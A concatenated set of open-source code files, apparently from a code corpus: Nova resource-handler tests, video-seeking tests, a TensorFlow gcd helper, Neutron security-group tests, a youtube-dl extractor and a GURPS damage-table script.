self.assertEqual(int(expected_resA),
self.r_handler._mgr['resA'].obj.used_res)
self.assertEqual(int(expected_resB),
self.r_handler._mgr['resB'].obj.used_res)
def test_update_from_instance_without_extra_specs(self):
# Flavor id without extra spec
_flavor_id = 1
self._initialize_used_res_counter()
self.r_handler.resource_list = []
sign = 1
self.r_handler.update_from_instance(self._flavors[_flavor_id], sign)
self.assertEqual(0, self.r_handler._mgr['resA'].obj.used_res)
self.assertEqual(0, self.r_handler._mgr['resB'].obj.used_res)
def test_write_resources(self):
self._initialize_used_res_counter()
extra_resources = {}
expected = {'resA': 10, 'used_resA': 0, 'resB': 5, 'used_resB': 0}
self.r_handler.write_resources(extra_resources)
self.assertEqual(expected, extra_resources)
def test_test_resources_without_extra_specs(self):
limits = {}
# Flavor id without extra_specs
flavor = self._flavors[1]
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_test_resources_with_limits_for_different_resource(self):
limits = {'resource:resC': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_passing_test_resources(self):
limits = {'resource:resA': 10, 'resource:resB': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
self._initialize_used_res_counter()
result = self.r_handler.test_resources(flavor, limits)
self.assertEqual([None, None], result)
def test_failing_test_resources_for_single_resource(self):
limits = {'resource:resA': 4, 'resource:resB': 20}
# Flavor id with extra_specs
flavor = self._flavors[2]
self._initialize_used_res_counter()
result = self.r_handler.test_resources(flavor, limits)
expected = ['Free 4 < requested 5 ', None]
self.assertEqual(sorted(expected),
sorted(result))
def test_empty_resource_handler(self):
"""An empty resource handler has no resource extensions,
should have no effect, and should raise no exceptions.
"""
empty_r_handler = FakeResourceHandler([])
resources = {}
empty_r_handler.reset_resources(resources, None)
flavor = self._flavors[1]
sign = 1
empty_r_handler.update_from_instance(flavor, sign)
limits = {}
test_result = empty_r_handler.test_resources(flavor, limits)
self.assertEqual([], test_result)
sign = -1
empty_r_handler.update_from_instance(flavor, sign)
extra_resources = {}
expected_extra_resources = extra_resources
empty_r_handler.write_resources(extra_resources)
self.assertEqual(expected_extra_resources, extra_resources)
empty_r_handler.report_free_resources()
def test_vcpu_resource_load(self):
# load the vcpu example
names = ['vcpu']
real_r_handler = resources.ResourceHandler(names)
ext_names = real_r_handler._mgr.names()
self.assertEqual(names, ext_names)
# check the extension loaded is the one we expect
# and an instance of the object has been created
ext = real_r_handler._mgr['vcpu']
self.assertIsInstance(ext.obj, vcpu.VCPU)
class TestVCPU(test.NoDBTestCase):
def setUp(self):
super(TestVCPU, self).setUp()
self._vcpu = vcpu.VCPU()
self._vcpu._total = 10
self._vcpu._used = 0
self._flavor = fake_flavor_obj(vcpus=5)
self._big_flavor = fake_flavor_obj(vcpus=20)
self._instance = fake_instance.fake_instance_obj(None)
def test_reset(self):
# set vcpu values to something different to test reset
self._vcpu._total = 10
self._vcpu._used = 5
driver_resources = {'vcpus': 20}
self._vcpu.reset(driver_resources, None)
self.assertEqual(20, self._vcpu._total)
self.assertEqual(0, self._vcpu._used)
def test_add_and_remove_instance(self):
self._vcpu.add_instance(self._flavor)
self.assertEqual(10, self._vcpu._total)
self.assertEqual(5, self._vcpu._used)
self._vcpu.remove_instance(self._flavor)
self.assertEqual(10, self._vcpu._total)
self.assertEqual(0, self._vcpu._used)
def test_test_pass_limited(self):
result = self._vcpu.test(self._flavor, {'vcpu': 10})
self.assertIsNone(result, 'vcpu test failed when it should pass')
def test_test_pass_unlimited(self):
result = self._vcpu.test(self._big_flavor, {})
self.assertIsNone(result, 'vcpu test failed when it should pass')
def test_test_fail(self):
result = self._vcpu.test(self._flavor, {'vcpu': 2})
expected = 'Free CPUs 2.00 VCPUs < requested 5 VCPUs'
self.assertEqual(expected, result)
def test_write(self):
resources = {'stats': {}}
self._vcpu.write(resources)
expected = {
'vcpus': 10,
'vcpus_used': 0,
'stats': {
'num_vcpus': 10,
'num_vcpus_used': 0
}
}
self.assertEqual(sorted(expected),
sorted(resources))
| apache-2.0 | 6,284,124,628,291,576,000 | 32.370262 | 79 | 0.613489 | false |
rjw57/videosequence | test/test_simple_seeking.py | 1 | 2242 | from __future__ import print_function
from contextlib import closing
from PIL import ImageChops, ImageStat
from videosequence import VideoSequence
def assert_images_not_equal(im1, im2):
diff = ImageChops.difference(im1, im2)
for min_, max_ in ImageStat.Stat(diff).extrema:
if max_ > 0:
return
assert False
def assert_images_equal(im1, im2):
diff = ImageChops.difference(im1, im2)
for min_, max_ in ImageStat.Stat(diff).extrema:
if max_ != 0:
assert False
def test_duration(news_video, ice_video):
with closing(VideoSequence(news_video)) as s:
assert len(s) == 288
with closing(VideoSequence(ice_video)) as s:
assert len(s) == 468
def test_size(news_video):
with closing(VideoSequence(news_video)) as s:
assert s.width == 352
assert s.height == 288
def test_initial_and_final_frame(news_video, ice_video):
with closing(VideoSequence(news_video)) as s:
start = s[0]
end = s[-1]
assert_images_not_equal(start, end)
with closing(VideoSequence(ice_video)) as s:
start = s[0]
end = s[-1]
assert_images_not_equal(start, end)
def test_first_few_frames_differ(news_video):
with closing(VideoSequence(news_video)) as s:
last_mean = 0.0
for idx in range(5):
print("Frame", idx)
mean = ImageStat.Stat(s[idx]).mean[0]
assert mean != last_mean
assert mean > 0
last_mean = mean
def test_slice_news(news_video):
with closing(VideoSequence(news_video)) as s:
frames = [s[idx] for idx in range(5, 10)]
for f1, f2 in zip(frames, s[5:10]):
assert_images_equal(f1, f2)
def test_slice_ice(ice_video):
with closing(VideoSequence(ice_video)) as s:
frames = [s[idx] for idx in range(5, 10)]
for f1, f2 in zip(frames, s[5:10]):
assert_images_equal(f1, f2)
def __xtest_iteration(news_video, ice_video):
with closing(VideoSequence(news_video)) as s:
n = 0
for _ in s:
n += 1
assert n == len(s)
with closing(VideoSequence(ice_video)) as s:
n = 0
for _ in s:
n += 1
assert n == len(s)
| mit | -1,667,082,780,485,127,700 | 29.297297 | 56 | 0.597681 | false |
lukeiwanski/tensorflow | tensorflow/contrib/signal/python/ops/util_ops.py | 71 | 2459 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utility ops shared across tf.contrib.signal."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import fractions
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import math_ops
def gcd(a, b, name=None):
"""Returns the greatest common divisor via Euclid's algorithm.
Args:
a: The dividend. A scalar integer `Tensor`.
b: The divisor. A scalar integer `Tensor`.
name: An optional name for the operation.
Returns:
A scalar `Tensor` representing the greatest common divisor between `a` and
`b`.
Raises:
ValueError: If `a` or `b` are not scalar integers.
"""
with ops.name_scope(name, 'gcd', [a, b]):
a = ops.convert_to_tensor(a)
b = ops.convert_to_tensor(b)
a.shape.assert_has_rank(0)
b.shape.assert_has_rank(0)
if not a.dtype.is_integer:
raise ValueError('a must be an integer type. Got: %s' % a.dtype)
if not b.dtype.is_integer:
raise ValueError('b must be an integer type. Got: %s' % b.dtype)
# TPU requires static shape inference. GCD is used for subframe size
# computation, so we should prefer static computation where possible.
const_a = tensor_util.constant_value(a)
const_b = tensor_util.constant_value(b)
if const_a is not None and const_b is not None:
return ops.convert_to_tensor(fractions.gcd(const_a, const_b))
cond = lambda _, b: math_ops.greater(b, array_ops.zeros_like(b))
body = lambda a, b: [b, math_ops.mod(a, b)]
a, b = control_flow_ops.while_loop(cond, body, [a, b], back_prop=False)
return a
| apache-2.0 | -2,648,607,239,785,765,400 | 35.701493 | 80 | 0.687271 | false |
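# NOTE: usage sketch added for illustration; it is not part of the original
# module. With two plain Python ints both constant_value() lookups succeed,
# so the result is folded to a constant instead of being built from the
# while_loop.
if __name__ == '__main__':
  from tensorflow.python.client import session
  with session.Session() as sess:
    print(sess.run(gcd(54, 24)))  # 6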
sasukeh/neutron | neutron/tests/unit/plugins/oneconvergence/test_security_group.py | 28 | 4681 | # Copyright 2014 OneConvergence, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
import mock
from neutron.extensions import securitygroup as ext_sg
from neutron import manager
from neutron.plugins.oneconvergence import plugin as nvsd_plugin
from neutron.tests import tools
from neutron.tests.unit.agent import test_securitygroups_rpc as test_sg_rpc
from neutron.tests.unit.extensions import test_securitygroup as test_sg
PLUGIN_NAME = ('neutron.plugins.oneconvergence.'
'plugin.OneConvergencePluginV2')
AGENTNOTIFIER = ('neutron.plugins.oneconvergence.'
'plugin.NVSDPluginV2AgentNotifierApi')
DUMMY_NVSD_LIB = ('neutron.tests.unit.plugins.oneconvergence.'
'dummynvsdlib.NVSDApi')
class OneConvergenceSecurityGroupsTestCase(test_sg.SecurityGroupDBTestCase):
_plugin_name = PLUGIN_NAME
def setUp(self):
if 'v6' in self._testMethodName:
self.skipTest("NVSD Plugin does not support IPV6.")
def mocked_oneconvergence_init(self):
def side_effect(*args, **kwargs):
return {'id': str(uuid.uuid4())}
self.nvsdlib = mock.Mock()
self.nvsdlib.create_network.side_effect = side_effect
test_sg_rpc.set_firewall_driver(test_sg_rpc.FIREWALL_HYBRID_DRIVER)
notifier_cls = mock.patch(AGENTNOTIFIER).start()
self.notifier = mock.Mock()
notifier_cls.return_value = self.notifier
self.useFixture(tools.AttributeMapMemento())
with mock.patch.object(nvsd_plugin.OneConvergencePluginV2,
'oneconvergence_init',
new=mocked_oneconvergence_init):
super(OneConvergenceSecurityGroupsTestCase,
self).setUp(PLUGIN_NAME)
def tearDown(self):
super(OneConvergenceSecurityGroupsTestCase, self).tearDown()
class TestOneConvergenceSGServerRpcCallBack(
OneConvergenceSecurityGroupsTestCase,
test_sg_rpc.SGServerRpcCallBackTestCase):
pass
class TestOneConvergenceSecurityGroups(OneConvergenceSecurityGroupsTestCase,
test_sg.TestSecurityGroups,
test_sg_rpc.SGNotificationTestMixin):
def test_security_group_get_port_from_device(self):
with self.network() as n:
with self.subnet(n):
with self.security_group() as sg:
security_group_id = sg['security_group']['id']
res = self._create_port(self.fmt, n['network']['id'])
port = self.deserialize(self.fmt, res)
fixed_ips = port['port']['fixed_ips']
data = {'port': {'fixed_ips': fixed_ips,
'name': port['port']['name'],
ext_sg.SECURITYGROUPS:
[security_group_id]}}
req = self.new_update_request('ports', data,
port['port']['id'])
res = self.deserialize(self.fmt,
req.get_response(self.api))
port_id = res['port']['id']
plugin = manager.NeutronManager.get_plugin()
port_dict = plugin.get_port_from_device(mock.Mock(),
port_id)
self.assertEqual(port_id, port_dict['id'])
self.assertEqual([security_group_id],
port_dict[ext_sg.SECURITYGROUPS])
self.assertEqual([], port_dict['security_group_rules'])
self.assertEqual([fixed_ips[0]['ip_address']],
port_dict['fixed_ips'])
self._delete('ports', port_id)
def test_security_group_get_port_from_device_with_no_port(self):
plugin = manager.NeutronManager.get_plugin()
port_dict = plugin.get_port_from_device(mock.Mock(), 'bad_device_id')
self.assertIsNone(port_dict)
| apache-2.0 | -780,792,619,808,472,300 | 43.160377 | 78 | 0.590686 | false |
Kagee/youtube-dl | youtube_dl/extractor/ebaumsworld.py | 149 | 1055 | from __future__ import unicode_literals
from .common import InfoExtractor
class EbaumsWorldIE(InfoExtractor):
_VALID_URL = r'https?://www\.ebaumsworld\.com/video/watch/(?P<id>\d+)'
_TEST = {
'url': 'http://www.ebaumsworld.com/video/watch/83367677/',
'info_dict': {
'id': '83367677',
'ext': 'mp4',
'title': 'A Giant Python Opens The Door',
'description': 'This is how nightmares start...',
'uploader': 'jihadpizza',
},
}
def _real_extract(self, url):
video_id = self._match_id(url)
config = self._download_xml(
'http://www.ebaumsworld.com/video/player/%s' % video_id, video_id)
video_url = config.find('file').text
return {
'id': video_id,
'title': config.find('title').text,
'url': video_url,
'description': config.find('description').text,
'thumbnail': config.find('image').text,
'uploader': config.find('username').text,
}
| unlicense | -5,440,468,343,733,672,000 | 30.969697 | 78 | 0.538389 | false |
d2emon/gurps-helper | fill_dmg.py | 1 | 2024 | def thrustDice(value):
if value <= 10:
return 1
if value < 40:
return (value - 11) // 8 + 1
if value < 60:
return (value - 5) // 10 + 1
return (value) // 10 + 1
def thrustModifier(value):
if value <= 10:
return (value - 11) // 2 - 1
if value < 40:
return (value - 11) // 2 % 4 - 1
if value < 60:
return 1 + (value - 40) // 10 * 5 - (value - 40) // 5 * (value // 10 - 3)
if value < 70:
return (value - 60) // 5 * 2 - 1
if value < 100:
return (value - 60) // 5 % 2 * 2
return 0
def swingDice(value):
if value <= 10:
return 1
if value < 27:
return (value - 9) // 4 + 1
if value < 40:
return (value - 7) // 8 + 3
return (value) // 10 + 3
def swingModifier(value):
if value < 9:
return (value - 11) // 2
if value < 27:
return (value - 9) % 4 - 1
if value < 40:
g = (value - 9) // 2 + 1
return g % 4 - 1
if value < 60:
return (value - 40) // 5 % 2 * 2 - 1
if value < 100:
return (value - 60) // 5 % 2 * 2
return 0
def main():
import attributes
import db
e, s = db.connect()
s.query(attributes.BasicDamage).delete()
s.commit()
for st in range(1, 41):
print("{}\t{}d + {}\t{}d + {}".format(st, thrustDice(st), thrustModifier(st), swingDice(st), swingModifier(st)))
dmg = attributes.BasicDamage(
st,
[thrustDice(st), thrustModifier(st)],
[swingDice(st), swingModifier(st)],
)
print(dmg)
s.add(dmg)
for st in range(45, 101, 5):
print("{}\t{}d + {}\t{}d + {}".format(st, thrustDice(st), thrustModifier(st), swingDice(st), swingModifier(st)))
dmg = attributes.BasicDamage(
st,
[thrustDice(st), thrustModifier(st)],
[swingDice(st), swingModifier(st)],
)
print(dmg)
s.add(dmg)
s.commit()
if __name__ == "__main__":
main()
| gpl-3.0 | 4,602,057,884,589,448,700 | 24.3 | 120 | 0.48419 | false |
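# NOTE: spot-check added for illustration; it is not part of the original
# script and does not touch the attributes/db modules. The expected tuples
# correspond to two familiar GURPS Basic Set damage entries
# (ST 10: thr 1d-2 / sw 1d, ST 13: thr 1d / sw 2d-1).
def spot_check():
    assert (thrustDice(10), thrustModifier(10)) == (1, -2)
    assert (swingDice(10), swingModifier(10)) == (1, 0)
    assert (thrustDice(13), thrustModifier(13)) == (1, 0)
    assert (swingDice(13), swingModifier(13)) == (2, -1)
    print("spot check passed")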